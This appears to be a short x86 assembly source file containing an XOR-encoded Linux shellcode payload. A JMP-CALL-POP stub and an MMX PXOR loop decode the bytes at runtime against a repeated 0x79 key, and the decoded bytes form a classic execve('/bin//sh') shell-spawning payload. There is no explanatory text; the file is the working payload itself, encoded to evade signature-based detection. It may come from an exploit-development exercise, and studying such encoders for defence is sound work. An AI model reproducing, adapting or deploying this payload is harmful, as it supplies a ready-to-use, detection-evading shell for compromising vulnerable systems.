section .text

global _start:

_start:
	jmp short shellcodestr

decode:
	pop edi
	xor ecx,ecx
	lea esi,[edi+8]
	mov cl,4

decoder:
	movq mm0,qword [edi]
	movq mm1,qword [esi]
	pxor mm1,mm0
	movq qword[esi],mm1
	add esi,8
	loop decoder

	jmp short shellcode


shellcodestr:
	call decode
	dec : db 0x79,0x79,0x79,0x79,0x79,0x79,0x79,0x79
	shellcode : db 0x48,0xb9,0x29,0x11,0x17,0x56,0x0a,0x11,0x11,0x56,0x56,0x1b,0x10,0xf0,0x9a,0x29,0xf0,0x9b,0x2a,0xf0,0x98,0xc9,0x72,0xb4,0xf9,0x79,0x79,0x79,0x79,0x79,0x79,0x79
